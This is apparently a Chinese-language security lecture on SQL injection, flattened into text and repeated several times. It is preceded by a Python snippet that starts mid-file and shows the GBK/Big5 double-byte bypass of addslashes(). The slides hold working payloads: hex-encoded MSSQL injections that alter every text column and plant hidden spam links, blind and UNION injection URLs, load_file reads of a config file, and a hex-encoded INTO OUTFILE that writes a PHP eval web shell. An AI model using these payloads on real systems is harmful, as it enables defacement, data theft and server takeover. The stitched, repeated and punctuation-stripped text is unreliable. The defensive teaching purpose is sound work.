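def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping in the style of addslashes(): it never asks which
    charset the database will later use to decode the bytes."""
    out = bytearray()
    for b in data:
        if b in ESCAPED_BYTES:
            out.append(ord("\\"))
        out.append(b)
    return bytes(out)


def bare_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes the server still sees as unescaped after decoding
    the escaped bytes with the connection charset (SET NAMES gbk/big5/utf8).
    A backslash absorbed into a multibyte character no longer escapes."""
    text = escaped.decode(charset, errors="replace")
    count = 0
    pending_escape = False
    for ch in text:
        if pending_escape:
            pending_escape = False      # this character is escaped, whatever it is
        elif ch == "\\":
            pending_escape = True
        elif ch == "'":
            count += 1
    return count


def charset_aware_escape(raw: bytes, charset: str) -> bytes:
    """Decode with the connection charset FIRST (strictly), escape the decoded
    text, then re-encode. A dangling lead byte such as 0xB5 raises
    UnicodeDecodeError instead of being completed by the escaping backslash.
    This mirrors what a connection-aware escape routine does when the charset is
    set correctly; prepared statements avoid the problem entirely."""
    text = raw.decode(charset)
    text = (text.replace("\\", "\\\\")
                .replace("'", "\\'")
                .replace('"', '\\"')
                .replace("\x00", "\\0"))
    return text.encode(charset)


def rejects(raw: bytes, charset: str) -> bool:
    """True if charset-aware escaping refuses the input as malformed."""
    try:
        charset_aware_escape(raw, charset)
    except UnicodeDecodeError:
        return True
    return False


def compare_charsets(payload: bytes = PAYLOAD) -> dict:
    """Bare quotes left behind by addslashes() under each connection charset."""
    return {cs: bare_quotes(addslashes(payload), cs) for cs in ("gbk", "big5", "utf-8")}


if __name__ == "__main__":
    print(compare_charsets())                    # {'gbk': 1, 'big5': 1, 'utf-8': 0}
    print({cs: rejects(PAYLOAD, cs) for cs in ("gbk", "big5", "utf-8")})
    safe = charset_aware_escape("王'".encode("gbk"), "gbk")
    print(safe, bare_quotes(safe, "gbk"))        # legitimate GBK text: 0 bare quotes
```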
MSSQL Real-World Case - 116jurist.ru automated injection (1/4)
• 2012/12/xx 10:03:31
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(@s)--
MSSQL Real-World Case - 116jurist.ru automated injection (3/4)
• 2012/12/xx 10:03:44
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(@s)--
MSSQL Real-World Case - 116jurist.ru automated injection, decoded (4/4)
• Request 1 (10:03:31). For every text column wider than 10 characters it cuts off everything from a
  previously injected '</title><' onward, i.e. it cleans up an earlier injection before re-injecting:
  set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1)
  where ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
  DEALLOCATE Table_Cursor
• Request 2 (10:03:33). Widens every text column wider than 20 characters to varchar(8000) NOT NULL so the
  payload will fit:
  set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor
  INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• Request 3 (10:03:44). Appends a hidden (absolutely positioned, clipped) link to every text column wider
  than 80 characters; the link text is cp1251-encoded Russian:
  set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;
  clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru >юридические-услуги-москва</a></div>'' ')
  FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
